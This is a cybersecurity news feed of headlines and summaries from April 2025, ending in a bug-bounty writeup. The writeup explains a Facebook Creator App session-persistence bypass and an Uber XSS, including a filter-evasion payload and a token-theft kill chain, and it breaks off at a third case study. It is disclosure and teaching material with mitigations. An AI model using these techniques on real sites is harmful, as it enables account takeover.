The latest update, watchOS 11.4, released on April 1, 2025, targets vulnerabilities affecting the Apple Watch Series 6 and later. Key fixes include CVE-2025-24097, which addresses a permissions issue with AirDrop, and CVE-2025-24244, a flaw in font processing that could lead to memory disclosure. Authentication services have also been fortified, with patches for issues like CVE-2025-30430, which could allow attackers to bypass password autofill restrictions, and CVE-2025-24180, which affected WebAuthn credentials across websites with similar suffixes. Other security enhancements cover audio-related vulnerabilities, such as CVE-2025-24243, which addressed a flaw in processing malicious font files capable of triggering arbitrary code execution.

Conclusion
The release of these security updates highlights the critical role of timely patching in addressing vulnerabilities, particularly zero-day threats like CVE-2025-24200 and CVE-2025-24201. By backporting fixes to older devices, Apple aims to provide broader protection, though the effectiveness of such measures relies heavily on users applying updates promptly.
by The Cyber Express
2025-04-02 11:25:00
New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth
Cybersecurity researchers have discovered an updated version of a malware loader called Hijack Loader that implements new features to evade detection and establish persistence on compromised systems. "Hijack Loader released a new module that implements call stack spoofing to hide the origin of function calls (e.g., API and system calls)," Zscaler ThreatLabz researcher Muhammed Irfan V A said in
by The Hacker News
2025-04-02 11:19:00
Apple’s appeal to the Investigatory Powers Tribunal over the UK’s encryption ‘back door’ explained
Apple has appealed to the Investigatory Powers Tribunal over an order by home secretary Yvette Cooper to give the UK access to customers' data protected by Advanced Data Protection encryption. What happens next?
by ComputerWeekly
2025-04-02 11:00:54
AI Hiring Frenzy: The Risks of Rushed Recruitment, Overlooked Talent
As companies scramble to hire AI talent, experts warn that neglecting strategic workforce planning and inclusive hiring practices may lead to costly, unsustainable outcomes.
by ITPro Today
2025-04-02 10:48:31
ChatGPT is down worldwide with something went wrong error
ChatGPT, the famous artificial intelligence chatbot that allows users to converse with various personalities and topics, has connectivity issues worldwide. [...]
by BleepingComputer
2025-04-02 10:45:54
Lazarus Uses ClickFix Tactics in Fake Cryptocurrency Job Attacks
North Korea’s Lazarus hackers are using the ClickFix technique for malware deployment in fresh attacks targeting the cryptocurrency ecosystem. The post Lazarus Uses ClickFix Tactics in Fake Cryptocurrency Job Attacks appeared first on SecurityWeek.
by SecurityWeek
2025-04-02 10:38:33
Mass login scans of PAN GlobalProtect portals surge
Nearly 24K unique IP addresses have attempted to access portals in the last 30 days, raising concerns of imminent attacks.
by Cybersecurity Dive
2025-04-02 10:36:16
Royal Mail Group Loses 144GB to Infostealers: Same Samsung Hacker, Same 2021 Infostealer Log
By Alon Gal | April 2025
Just days after reporting on the Samsung Tickets data breach, another massive leak has surfaced, this time targeting Royal Mail Group, a British institution with over 500 years of history. On April 2, 2025, a threat actor known as “GHNA” posted on BreachForums, announcing the release of 144GB of data […] The post Royal Mail Group Loses 144GB to Infostealers: Same Samsung Hacker, Same 2021 Infostealer Log appeared first on InfoStealers.
by InfoStealers
2025-04-02 10:30:00
Questions Remain Over Attacks Causing DrayTek Router Reboots
DrayTek has shared some clarifications regarding the recent attacks causing router reboots, but some questions remain unanswered. The post Questions Remain Over Attacks Causing DrayTek Router Reboots appeared first on SecurityWeek.
by SecurityWeek
2025-04-02 10:05:10
Police shut down KidFlix child sexual exploitation platform
Kidflix, one of the largest platforms used to host, share, and stream child sexual abuse material (CSAM) on the dark web, was shut down on March 11 following a joint action coordinated by German law enforcement. [...]
by BleepingComputer
2025-04-02 10:05:00
Google Brings End-to-End Encrypted Emails to All Enterprise Gmail Users
Gmail now allows enterprise users to send end-to-end encrypted emails to colleagues, and will soon allow sending to any inbox. The post Google Brings End-to-End Encrypted Emails to All Enterprise Gmail Users appeared first on SecurityWeek.
by SecurityWeek
2025-04-02 10:01:16
It takes two: The 2025 Sophos Active Adversary Report
The dawn of our fifth year deepens our understanding of the enemies at the gate, and some tensions inside it; plus, an anniversary gift from us to you
by Sophos News
2025-04-02 10:01:11
The Reality Behind Security Control Failures—And How to Prevent Them
Most orgs only discover their security controls failed after a breach. With OnDefend's continuous validation, you can test, measure, and prove your defenses work—before attackers exploit blind spots. [...]
by BleepingComputer
2025-04-02 10:00:05
TookPS: DeepSeek isn’t the only game in town
The TookPS malicious downloader is distributed under the guise of DeepSeek, and further mimics UltraViewer, AutoCAD, SketchUp, Ableton, and other popular tools.
by Securelist
2025-04-02 09:57:23
Counterfeit Android devices found preloaded with Triada malware
A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up. [...]
by BleepingComputer
2025-04-02 09:56:06
OpenSNP to Shut Down and Delete All User-Submitted DNA Data
OpenSNP, a decade-old open science platform that allowed users to publicly share their genetic and phenotypic data, will officially shut down on April 30, 2025. All user-contributed data will be permanently deleted, marking the end of one of the most prominent grassroots efforts to democratize access to human genomics. The shutdown was announced by co-founder … The post OpenSNP to Shut Down and Delete All User-Submitted DNA Data appeared first on CyberInsider.
by Cyber Insider
2025-04-02 09:55:00
Threat Spotlight: The good, the bad, and the ‘gray bots’ – the Gen AI scraper bots targeting your web apps
Generative AI scraper bots are gray bots designed to extract or scrape large volumes of data from websites, often to train generative AI models. In this report we look at what the data tells us about Gen AI gray bot activity facing organizations today.
by Barracuda
2025-04-02 09:54:12
Bridewell appoints Sam Thornton as COO to strengthen operations and accelerate growth
Leading UK cyber security firm, Bridewell, has announced the appointment of Sam Thornton as Chief Operating Officer and welcomed him to its board of directors, a move which the company hopes will further strengthen Bridewell’s position as a globally recognised cyber security services company. Sam Thornton is a highly experienced, client-centric business leader with 20 […] The post Bridewell appoints Sam Thornton as COO to strengthen operations and accelerate growth appeared first on IT Security Guru.
by IT Security Guru
2025-04-02 09:49:20
North Korean IT workers set their sights on European organizations
North Korean IT workers are expanding their efforts beyond the US, and are seeking to fraudulently gain employment with organizations around the world, but most especially in Europe. According to Google’s threat researchers, they are also increasingly attempting to extort money from these companies once they get discovered and/or fired. “Previously, workers terminated from their places of employment might attempt to provide references for their other personas so that they could be rehired by the … More → The post North Korean IT workers set their sights on European organizations appeared first on Help Net Security.
by Help Net Security
2025-04-02 09:37:28
Check Point Software confirms security incident but pushes back on threat actor claims
A malicious hacker recently offered to sell the security firm’s sensitive customer information.
by Cybersecurity Dive
2025-04-02 09:32:10
FTC chief flags data privacy concerns in 23andMe bankruptcy
The company filed for bankruptcy after financial challenges over the past few years and a massive data breach in 2023.
by Cybersecurity Dive
2025-04-02 09:27:31
Expert urges small businesses to strengthen cyber defenses
Cybercrime has surged, with the FBI receiving over 800,000 complaints that resulted in $12.5 billion in losses, including more than $1 billion in Texas alone, according to a report by MRT.
by SC Media
2025-04-02 09:25:17
Cybercriminals target auto industry with sophisticated hacks
Automotive cyberattacks have caused tens of billions in damages from 2022 to 2024, highlighting escalating threats to vehicle security, according to a study by cybersecurity firm VicOne, Repairer Driven News reports.
by SC Media
2025-04-02 09:21:16
IT leaders sound alarm on centralized security risks
A survey by Naoris Protocol highlights growing concerns among IT leaders over cybersecurity vulnerabilities, indicating that a shift may be needed toward decentralized infrastructure for resilience and security, ComputerWeekly reports.
by SC Media
2025-04-02 09:19:27
Over half of web traffic is bot-generated, report says
More than half of all web content requests now come from bots, with AI-driven automation fueling a surge in traffic, according to a report by SiliconAngle.
by SC Media
2025-04-02 09:19:06
Cisco warns of CSLU backdoor admin account used in attacks
Cisco warns admins to patch a critical Cisco Smart Licensing Utility (CSLU) vulnerability, which exposes a built-in backdoor admin account now used in attacks. [...]
by BleepingComputer
2025-04-02 09:17:05
Cyber threats against software supply chain fueled by AI
SiliconAngle reports that growing artificial intelligence adoption across the software supply chain has prompted significantly more cybersecurity threats, which were mostly Common Vulnerabilities and Exposures, malicious packages, exposed secrets, and misconfigurations.
by SC Media
2025-04-02 09:15:29
Renewal of state, local cyber grant program sought
House Subcommittee on Cybersecurity and Infrastructure Protection lawmakers have been urged to ratify State and Local Cybersecurity Grant Program funding amid the threat of cutbacks as its efficacy is being doubted by Department of Homeland Security Secretary Kristi Noem, StateScoop reports.
by SC Media
2025-04-02 09:13:21
Medical device cybersecurity to be adversely impacted by HHS layoffs
Significant layoffs at the Department of Health and Human Services were regarded by lawmakers and cybersecurity experts to be ultimately detrimental to the safety and security of medical devices, reports The Record, a news site by cybersecurity firm Recorded Future.
by SC Media
2025-04-02 09:00:00
What is a uniform resource identifier (URI)?
A uniform resource identifier (URI) is a character sequence that identifies a logical (abstract) or physical resource -- usually, but not always, connected to the internet.
by ComputerWeekly
2025-04-02 08:52:53
Apple backported fixes for three actively exploited flaws to older devices
Apple backports three critical vulnerabilities actively exploited in attacks against older iOS and macOS models. Apple has backported fixes for three actively exploited vulnerabilities to older devices and OS versions. The three vulnerabilities are: Apple released the following updates: that are available for the following devices:
Pierluigi Paganini (SecurityAffairs – hacking, newsletter)
by Security Affairs
2025-04-02 08:34:00
What is subdomain hijacking?
Subdomain hijacking is a cybersecurity risk where attackers exploit abandoned DNS records to take control of legitimate subdomains. This can lead to phishing attacks, credential theft, and malware distribution. Organizations must regularly audit DNS records, remove outdated entries, and strengthen cloud security policies to prevent these vulnerabilities.
by Sectigo
2025-04-02 07:35:16
Darktrace’s view on Operation Lunar Peek: Exploitation of Palo Alto firewall devices (CVE 2024-0012 and 2024-9474)
Darktrace’s Threat Research team investigated a major campaign exploiting vulnerabilities in Palo Alto firewall devices (CVE-2024-0012 and CVE-2024-9474). Learn about the spike in post-exploitation activities and understand the need for anomaly-based detection to stay ahead of evolving threats.
by Darktrace
2025-04-02 07:35:02
Company Shuts Down Cyber-attacks with “Flawless” Detection and Response from Darktrace
This blog explores how Darktrace shut down a major third-party cyber-attack, preventing the deployment of ransomware. Read more to discover how the security team now spends 80-90% of their time working on more strategic projects vs. manual, low-level tasks.
by Darktrace
2025-04-02 07:34:22
Exabeam Nova accelerates threat detection and response
Exabeam unveiled Exabeam Nova, an autonomous AI agent delivering actionable intelligence that enables security teams to respond faster to incidents, reduce investigation times by over 50%, and mitigate threats more effectively. Exabeam delivers a multi-agent experience where specialized AI components are integrated throughout the security operations workflow. Unlike passive AI assistants that merely retrieve and synthesize data, Exabeam Nova automatically correlates multiple attack signals, actively investigates cases, and classifies threats based on real-world behavioral context … More → The post Exabeam Nova accelerates threat detection and response appeared first on Help Net Security.
by Help Net Security
2025-04-02 07:34:09
Defending Against Living-off-the-Land Attacks: Anomaly Detection in Action
Discover how Darktrace detected and responded to cyberattacks using Living-off-the-Land (LOTL) tactics to exploit trusted services and tools on customer networks.
by Darktrace
2025-04-02 07:33:54
Darktrace Releases Annual 2024 Threat Insights
Explore Darktrace's Annual Threat Report 2024 for insights on the latest cyber threats and trends observed throughout the year.
by Darktrace
2025-04-02 07:33:38
Unifying IT & OT With AI-Led Investigations for Industrial Security
Discover how AI-led investigations unify IT and OT security, reducing alert fatigue and accelerating alert investigation in industrial environments.
by Darktrace
2025-04-02 07:33:25
Detecting and Containing Account Takeover with Darktrace
Account takeovers are rising with SaaS adoption. Learn how Darktrace detects deviations in user behavior and autonomously stops threats before they escalate.
by Darktrace
2025-04-02 07:32:58
Fighting the Real Enemy: The Importance of Responsible Vulnerability Disclosure Between Email Security Vendors
This blog explores an exploitation capability observed by Darktrace in another email security vendor’s link rewriting and the steps Darktrace took to inform and resolve the issue.
by Darktrace
2025-04-02 07:30:00
Keysight introduces AI network architecture validation, optimisation tool
Tool designed to validate the network performance of AI workloads and system infrastructure by adjusting and optimising parameters
by ComputerWeekly
2025-04-02 07:29:05
Spike in Palo Alto Networks scanner activity suggests imminent cyber threats
Hackers are scanning for vulnerabilities in Palo Alto Networks GlobalProtect portals, likely preparing for targeted attacks. Researchers at the threat intelligence firm GreyNoise warn that hackers are scanning for vulnerabilities in Palo Alto Networks GlobalProtect portals, likely in preparation for targeted attacks. GreyNoise reports that over 24,000 unique IP addresses […]
by Security Affairs
2025-04-02 07:22:59
Thailand Enhances Cyber Resilience with AI-Powered Security Measures
In an effort to enhance Thailand’s cybersecurity infrastructure, the National Cyber Security Agency (NCSA) and Google Cloud have announced a strategic collaboration to improve cyber resilience. The initiative, launched during Safer Songkran, aligns with ongoing efforts to protect citizens and government entities from escalating cyber threats. This alliance builds on the Thai government’s existing collaboration with Google to enhance online security. As part of this partnership, NCSA and Google Cloud will engage in threat intelligence sharing and develop incident response capabilities to counter evolving cyber threats. This collaboration is particularly crucial as digital transformation in Thailand accelerates, making strong cybersecurity measures a necessity. One key achievement highlighted was Google Play Protect’s anti-scam feature, launched in partnership with the Ministry of Digital Economy and Society (MDES) in 2024, which has successfully blocked over 6.6 million high-risk app installations. To further enhance mobile security, new protections have been introduced to mitigate social engineering attacks that target Thai users.

Thailand Government's Commitment to Cyber Resilience
Thailand’s Deputy Prime Minister and Minister of Digital Economy and Society, Prasert Jantararuangtong, emphasized the urgency of strengthening cybersecurity to stop online scams. He acknowledged Google’s commitment to this cause, stating: “Strengthening cybersecurity and combating online scams are paramount and urgent priorities for the government, especially as organizations and individuals increasingly embrace digital innovation. We commend Google for its proactive and continuous efforts in collaborating with us to safeguard citizens online through its cyber literacy programs and implementation of enhanced anti-scam features in Google Play Protect on Android devices.” Secretary General of NCSA, Amorn Chomchoey, reiterated the importance of combining skilled talent with advanced technology. He highlighted how Google Cloud Cybershield and Mandiant’s expertise will serve as critical tools in strengthening Thailand’s cyber defenses.

A Coordinated National Cyber Defense Strategy
NCSA will deploy Google Cloud Cybershield, an AI-powered security platform that integrates automation, analytics, and threat intelligence. This initiative will enhance centralized monitoring of security threats across public sector entities. Through ThaiCERT, Thailand’s national cyber defense center, a more streamlined and coordinated response to cyber threats targeting government agencies and critical infrastructure will be established. Key components of the collaboration include:
Threat Intelligence Sharing: Google Cloud will provide NCSA access to Google Threat Intelligence, Mandiant’s threat insights, and VirusTotal’s database. This will help the government understand and counter cybercriminal tactics and state-sponsored attacks.
Incident Response Training: Mandiant consultants will train information security professionals in incident response, digital forensics, and malware analysis. These initiatives will expand Thailand’s pool of cybersecurity experts within the public sector.

Protecting Thai Citizens from Cyber Threats
Beyond national security, the partnership also aims to enhance individual user protection. NCSA and Google Cloud will integrate Google Cloud Web Risk into government cybersecurity frameworks to defend against online scams and phishing attempts. Web Risk APIs will provide real-time intelligence on malicious websites, allowing NCSA to proactively block access to dangerous URLs. This capability mirrors the functionality of Google Safe Browsing, which analyzes over 10 billion URLs daily and protects more than five billion devices worldwide. Google Cloud’s Thailand Country Director, Annop Siritikul, highlighted the economic importance of cybersecurity: “Thailand’s digital economy is set to grow from US$46 billion in 2024 to at least US$100 billion by 2030. At Google Cloud, we believe we can contribute meaningfully toward the collective cyber defense that’s required to safeguard this future growth.”

Enhanced Mobile Security Against Scams
Thailand was among the first countries to implement Google Play Protect’s anti-scam feature in 2024. The feature has since prevented over 6.6 million high-risk app installations on more than 1.4 million Android devices in the country. In 2025, Google introduced additional security measures to counter cybercriminals who use social engineering tactics over phone calls. Now, the toggle switch to disable Play Protect’s app scanning feature is locked during phone calls, preventing scammers from deceiving users into disabling security protections.

Digital Future for Thailand
The Safer Songkran initiative, launched under the Safer with Google program, continues to empower Thai citizens with essential cybersecurity tools and knowledge. The collaboration between NCSA and Google Cloud is a significant step toward building a more secure digital ecosystem for Thailand, ensuring that individuals and organizations can safely benefit from digital transformation. By adopting AI-driven security technologies, advanced threat intelligence, and public-private collaboration, Thailand is strengthening its position as a leader in cybersecurity in the Asia-Pacific region.
by The Cyber Express
2025-04-02 05:19:00
“Urgent reminder” tax scam wants to phish your Microsoft credentials
With tax season in full swing, we're seeing scammers flexing their social engineering muscles. Be prepared.
by Malwarebytes Labs
2025-04-02 05:00:02
Balancing data protection and clinical usability in healthcare
In this Help Net Security interview, Aaron Weismann, CISO at Main Line Health, discusses the growing ransomware threat in healthcare and why the sector remains a prime target. He explains the difficulties of protecting patient information, securing legacy systems, and maintaining cybersecurity without disrupting care. Weismann also shares practical steps for improving incident response and strengthening defenses with limited resources. How have ransomware tactics evolved in the healthcare sector, and what makes healthcare such a … More → The post Balancing data protection and clinical usability in healthcare appeared first on Help Net Security.
by Help Net Security
2025-04-02 04:30:11
BlueToolkit: Open-source Bluetooth Classic vulnerability testing framework
BlueToolkit is an open-source tool that helps find security flaws in Bluetooth Classic devices. It runs known and custom exploits to test if a device is vulnerable. Right now, it includes 43 different exploits. Some are public, and others were made specifically for this toolkit. “The framework allows you to reuse PoCs of different attacks and connect your own hardware with minimal code/configuration needed. The concept is simple and known – vulnerability scanners make use … More → The post BlueToolkit: Open-source Bluetooth Classic vulnerability testing framework appeared first on Help Net Security.
by Help Net Security
2025-04-02 03:47:00
What is an initialization vector?
An initialization vector (IV) is an arbitrary number that can be used with a secret key for data encryption to foil cyber attacks.
by ComputerWeekly
2025-04-02 01:00:00
Malaysian Airport's Cyber Disruption a Warning for Asia
Transportation facilities and networks slowly adapt to changes and threats, leaving them vulnerable to agile cyberattackers, as demonstrated by the $10 million ransomware attack.
by Dark Reading
2025-04-02 00:00:00
[remote] ProSSHD 1.2 - Denial of Service (DOS)
by Exploit DB
2025-04-02 00:00:00
[remote] SAP NetWeaver - 7.53 - HTTP Request Smuggling
by Exploit DB
2025-04-02 00:00:00
[webapps] ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
by Exploit DB
2025-04-02 00:00:00
[webapps] ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
by Exploit DB
2025-04-02 00:00:00
[webapps] Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS
by Exploit DB
2025-04-01 22:38:47
Google Brings End-to-End Encryption to Gmail
The new Google Workspace features will make it easier for enterprise customers to implement end-to-end encryption within Gmail.
by Dark Reading
2025-04-01 22:38:00
Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign
Exposed PostgreSQL instances are the target of an ongoing campaign designed to gain unauthorized access and deploy cryptocurrency miners. Cloud security firm Wiz said the activity is a variant of an intrusion set that was first flagged by Aqua Security in August 2024 that involved the use of a malware strain dubbed PG_MEM. The campaign has been attributed to a threat actor Wiz tracks as
by The Hacker News
2025-04-01 22:00:50
Best Data Anonymization Tools in 2025
Top data anonymization tools of 2025 to protect sensitive information, ensure compliance, and maintain performance across industries.
by Hackread
2025-04-01 21:59:17
Visibility, Monitoring Key to Enterprise Endpoint Strategy
A successful enterprise security defense requires a successful endpoint security effort. With options ranging from EDR, SIEM, SOAR, and more, how do security teams cut through the clutter and focus on what matters?
by Dark Reading
2025-04-01 21:50:22
An Improved Detection Signature for the Kubernetes IngressNightmare Vulnerability
Wiz recently published a detailed analysis of a critical vulnerability in the NGINX Ingress admission controller—what they’ve dubbed IngressNightmare (CVE-2025-1097, CVE-2025-1098, CVE-2025-1974, CVE-2025-24514). The vulnerability stems from insufficient input validation during configuration file processing, allowing an attacker to inject arbitrary code into the NGINX process. Wiz’s writeup is excellent and covers the technical nuances thoroughly, […] The post An Improved Detection Signature for the Kubernetes IngressNightmare Vulnerability appeared first on Praetorian.
by Praetorian
2025-04-01 21:14:39
Babuk2 Bjorka: The Evolution of Ransomware for ‘Data Commoditization’
An investigation that started with a tip from one of our threat intel sources about the revival of the Babuk (figure 1) threat group has led Trustwave SpiderLabs to uncover what appears to be a paradigm shift in the ransomware landscape.
by SpiderLabs Blog
2025-04-01 21:04:00
Enterprise Gmail Users Can Now Send End-to-End Encrypted Emails to Any Platform
On the 21st birthday of Gmail, Google has announced a major update that allows enterprise users to send end-to-end encrypted (E2EE) email to any user in any email inbox in a few clicks. The feature is rolling out starting today in beta, allowing users to send E2EE emails to Gmail users within an organization, with plans to send E2EE emails to any Gmail inbox in the coming weeks and to any email inbox
by The Hacker News
2025-04-01 20:53:27
Surge in Scans on PAN GlobalProtect VPNs Hints at Attacks
Over the past few weeks, bad actors from different regions have been scanning devices with the VPN for potential vulnerabilities.
by Dark Reading
2025-04-01 20:40:16
The State of NIS2: A Fragmented Implementation Across the EU
The Network and Information Systems Directive 2022 (NIS2) was designed to strengthen the cybersecurity resilience of critical infrastructure across the European Union. However, while member states were required to transpose NIS2 into national law by October of 2024, many fell short of this deadline.
by KnowBe4
2025-04-01 20:39:51
Exploring the Implications of DORA: A New Global Standard For Financial Cybersecurity
As of January 17, 2025, the Digital Operational Resilience Act (DORA) came into force across all European Union member states, with the crucial aim of strengthening the IT security of financial entities such as banks, insurance companies and investment firms.
by KnowBe4
2025-04-01 20:39:10
Most Phishing Emails Rely Purely on Social Engineering
99% of phishing emails that reached inboxes last year did not contain malware, according to a new report from Fortra.
by KnowBe4
2025-04-01 20:13:12
As CISA Downsizes, Where Can Enterprises Get Support?
In this roundtable, cybersecurity experts — including two former CISA executives — weigh in on alternate sources for threat intel, incident response, and other essential cybersecurity services.
by Dark Reading
2025-04-01 19:48:00
Lucid PhaaS Hits 169 Targets in 88 Countries Using iMessage and RCS Smishing
A new sophisticated phishing-as-a-service (PhaaS) platform called Lucid has targeted 169 entities in 88 countries using smishing messages propagated via Apple iMessage and Rich Communication Services (RCS) for Android. Lucid's unique selling point lies in its weaponizing of legitimate communication platforms to sidestep traditional SMS-based detection mechanisms. "Its scalable,
by The Hacker News
2025-04-01 18:54:16
Japan Bolsters Cybersecurity Safeguards With Cyber Defense Bill
The bill will allow Japan to implement safeguards and strategies that have been in use by other countries for some time.
by Dark Reading
2025-04-01 18:37:49
Check Point Disputes Hacker's Breach Claims
The security vendor counters that none of the information came directly from its systems but rather was acquired over a period of time by targeting individuals.
by Dark Reading
2025-04-01 18:32:12
Microsoft warns of critical flaw in Canon printer drivers
Microsoft’s offensive security team discovered a critical code execution vulnerability impacting Canon printer drivers. Researchers at Microsoft’s Offensive Research and Security Engineering (MORSE) team have discovered a critical code execution vulnerability, tracked as CVE-2025-1268 (CVSS score of 9.4), impacting Canon printer drivers. The vulnerability is an out-of-bounds issue that resides in certain printer drivers for […]
by Security Affairs
2025-04-01 18:23:29
Oracle Hit with Lawsuit Over Alleged Cloud Breach Affecting Millions
Oracle faces a class action lawsuit filed in Texas over a cloud data breach exposing sensitive data of 6M+ users; the plaintiff alleges negligence and delays.
by Hackread
2025-04-01 18:22:00
Windows 11 is getting a secret weapon for boot failures - how it works
Windows 11 PC won't boot? Microsoft's Quick Machine Recovery will automatically try to fix it before you have time to panic.
by ZDNET Security
2025-04-01 17:33:04
New Windows 11 trick lets you bypass Microsoft Account requirement
A previously unknown trick lets you easily bypass using a Microsoft Account in Windows 11, just as Microsoft tries to make it harder to use local accounts. [...]
by BleepingComputer
2025-04-01 17:16:28
How to Eliminate Software Development Bottlenecks
Bottlenecks waste team time, energy, and resources. Here's how to prevent getting stuck.
by ITPro Today
2025-04-01 17:05:04
Genetic sharing site openSNP to shut down, citing concerns of data privacy and ‘rise in authoritarian governments’
The open source repository of genetic data will delete its banks of data on April 30, its co-founder confirms.
by TechCrunch
2025-04-01 16:58:00
Apple Backports Critical Fixes for 3 Recent 0-Days Impacting Older iOS and macOS Devices
Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the operating systems. The vulnerabilities in question are listed below - CVE-2025-24085 (CVSS score: 7.3) - A use-after-free bug in the Core Media component that could permit a malicious application already installed on a device to elevate
by The Hacker News
2025-04-01 16:47:00
Nearly 24,000 IPs Target PAN-OS GlobalProtect in Coordinated Login Scan Campaign
Cybersecurity researchers are warning of a spike in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways, with nearly 24,000 unique IP addresses attempting to access these portals. "This pattern suggests a coordinated effort to probe network defenses and identify exposed or vulnerable systems, potentially as a precursor to targeted exploitation," threat
by The Hacker News
2025-04-01 16:40:48
5 tools I trust to keep my online conversations private and anonymous
Privacy matters. These apps and services help you communicate without putting your identity or data at risk from prying eyes.
by ZDNET Security
2025-04-01 16:35:00
Enhancing Customer Engagement with Outsourced Telemarketing
In the competitive world where artificial intelligence (AI) has made it easy to use technology, companies are constantly…
by Hackread
2025-04-01 16:33:00
China-Linked Earth Alux Uses VARGEIT and COBEACON in Multi-Stage Cyber Intrusions
Cybersecurity researchers have shed light on a new China-linked threat actor called Earth Alux that has targeted various key sectors such as government, technology, logistics, manufacturing, telecommunications, IT services, and retail in the Asia-Pacific (APAC) and Latin American (LATAM) regions. "The first sighting of its activity was in the second quarter of 2023; back then, it was
by The Hacker News
2025-04-01 16:33:00
New Case Study: Global Retailer Overshares CSRF Tokens with Facebook
Are your security tokens truly secure? Explore how Reflectiz helped a giant retailer to expose a Facebook pixel that was covertly tracking sensitive CSRF tokens due to human error misconfigurations. Learn about the detection process, response strategies, and steps taken to mitigate this critical issue. Download the full case study here. By implementing Reflectiz's recommendations, the
by The Hacker News
2025-04-01 16:13:33
Someone is trying to recruit security researchers in bizarre hacking campaign
An obscure wannabe hacker's tantalizing (and clearly sketchy) job offer has some security researchers asking, why?
by TechCrunch
2025-04-01 16:12:03
$4100 in Bug Bounties: Session Hacking Exploits Explained

Introduction: The Illusion of Logging Out
Picture handing in your office keycard only for it to still open the building months down the line. That’s what this session expiration bypass in the Facebook Creator App is all about. Although users logged out from all devices or changed their passwords, attackers could keep permanent access: uploading or deleting posts and sending messages to followers ad infinitum. This was a session persistence flaw, not a session theft flaw: several functions in the app displayed “Session Expired” but in practice turned a blind eye. For businesses and creators the stakes were incredibly high: a compromised account could mean brand sabotage, financial loss, or reputation damage.

🔍 Case Study Breakdowns

Case Study 1: Session Expiration Bypass in Facebook Creator App
The Never-Ending Session: How a Facebook Flaw Let Hackers Stay Logged In Forever (And Why Logging Out Isn’t Always Enough)
Vulnerability Type: Session expiration bypass via offline action queuing
Impact: Attackers could maintain permanent access to accounts, even after password changes or forced logouts.
Significance: This flaw turned a “log out all devices” feature into a placebo, undermining user trust in critical security controls.
Bounty Awarded: $2500
Bug Bounty Writeup: Medium Article

Vulnerability Explanation: When “Logged Out” Doesn’t Mean “Locked Out”
Imagine firing an employee, only to watch them keep working because their computer didn’t get the memo. That’s what happened here. Facebook Creator Studio, a tool for managing Pages, failed to fully invalidate sessions, allowing attackers to linger and keep acting on a session that should have been dead. Sessions are like temporary access badges: they should expire immediately when revoked. But in this case, the Facebook Creator App treated session termination as a suggestion, not a rule.

Exploitation Process: Hacking in the Dark
Step 1: The “What If?” Moment
Ajay (the bounty hunter) thought to himself: “What if logging out of all your sessions does not actually disable them?” His reasoning: security features usually focus on showing nice feedback in the UI, but what matters is consistency in the backend.
Step 2: Two Devices, One Trap
Device A (Laptop): Logged into Facebook Creator Studio.
Device B (Phone): Also online.
Logout Triggered: From Device A, he logged out all active sessions.
Device B’s Response: It indicated “session expired”, but…
Step 3: The Airplane Mode Trick
Disable Wi-Fi and mobile data on Device B. Restart the app (still offline). Make a post and click the “Publish” button. Restore internet: the post is uploaded to Facebook’s servers.
Creative Twist: The application blindly trusted offline activity and failed to re-verify session validity when it reconnected. It is as if a package were sent after your mailbox had been destroyed and the postal service still delivered it.
Mitigation
Server-Side Session Kill Switches: Invalidate sessions globally, not just in the UI.
Validate Before Synchronizing: Check session status before running through queues of actions.
Force Reauthentication: Prompt for login on high-risk actions following a network interruption.
Pro Tip: Use Burp Suite to capture and replay requests post-logout.
Stay skeptical, test offline, and remember: sessions can haunt you. 👻

Case Study 2: When a Typo Uncovers a Goldmine
Hacking Uber with a Single Slash: The XSS Trick That Stole Facebook Sessions (And Why Tiny Flaws Can Have Massive Consequences)
Vulnerability Type: Cross-Site Scripting (XSS) leading to Facebook session token theft
Impact: Full account takeover via stolen Facebook credentials.
Significance: A chain reaction of small flaws (bypassed filters, weak CSP, and misconfigured ACLs) turned a minor bug into a critical exploit.
Bounty Awarded: $1500
Original Writeup: Medium Article

Vulnerability Description: XSS chained with Facebook’s API to steal tokens.
Picture a burglar climbing in through a broken window and finding the keys to the vault lying inside. That’s what happened here. One badly misconfigured Uber endpoint, coupled with weak security protections, enabled hackers to seize Facebook sessions; the root causes were a missing slash and a case-sensitivity oversight. XSS is like dropping a counterfeit letter into a mailbox: attackers inject malicious scripts into legitimate websites, and browsers dutifully run them. Here, Uber’s blog search endpoint (/es-CL/blog/santiago/search/) failed to sanitize user input.

Exploitation Process:
Step 1: The Midnight Hunt
Feeling stuck in a bug hunt, the researcher pivoted to Uber at 2:00 AM. Brute-forcing endpoints led him to a blog search page. His idea: “Static sites usually bury unused functionality. Let’s poke it.”
Step 2: Breaking the Filter
Initial XSS payloads failed, but persistence paid off. Here is how the author arrived at the payload: the input filter let HTML tags through (`<` and `>` were allowed), but blocked the `/` character and the word "script". By encoding the slash as `%2f` and changing case (e.g., `scripT`), the researcher got around the filter. This allowed executing arbitrary JavaScript, and ultimately stealing Facebook tokens belonging to Uber users’ accounts.
Bypass 1: Use %2f instead of / to avoid keyword blocking.
Bypass 2: Use mixed-case <scripT> to bypass case-sensitive filters.
Final Payload: <%2fscripT><script>confirm(document.domain)<%2fscripT>
This ran the JavaScript, which proved the vulnerability.
Step 3: Moving Up To Facebook Token Theft
At a hacker conference, a partner proposed chaining the XSS with the Facebook API. The point: “Uber accepts Facebook IDs. If we can pull tokens, we own the account.” The final JavaScript used by the attacker was along these lines:
The Kill Chain:
Bait the victim to the malicious page carrying the XSS.
Run JavaScript to steal tokens via Facebook’s FB.getLoginStatus().
Bypass CSP: Uber’s misconfigured content security policy trusted external scripts.
Creative Twist: Uber’s login flow was split between www.uber.com (static site) and auth.uber.com (auth). XSS on the static site was still able to interact with logged-in users, a big error.
Mitigation:
Sanitize Input Unapologetically: Escape all HTML special characters unless they are explicitly allowed.
Harden CSP: Use script-src 'self' and block untrusted scripts.
Separate Authentication: Keep login logic away from static content.
How to Find Such Vulnerabilities in the Real World?
Fuzz Forgotten Pages: With Burp Suite or by hand.
Break Filters Playfully: Try encoding, case-swapping, or unusual syntax.
Think Outside The Box: Always ask yourself, “What can I chain this vulnerability with?”

Case Study 3: Session-Jacking with Clickjacking
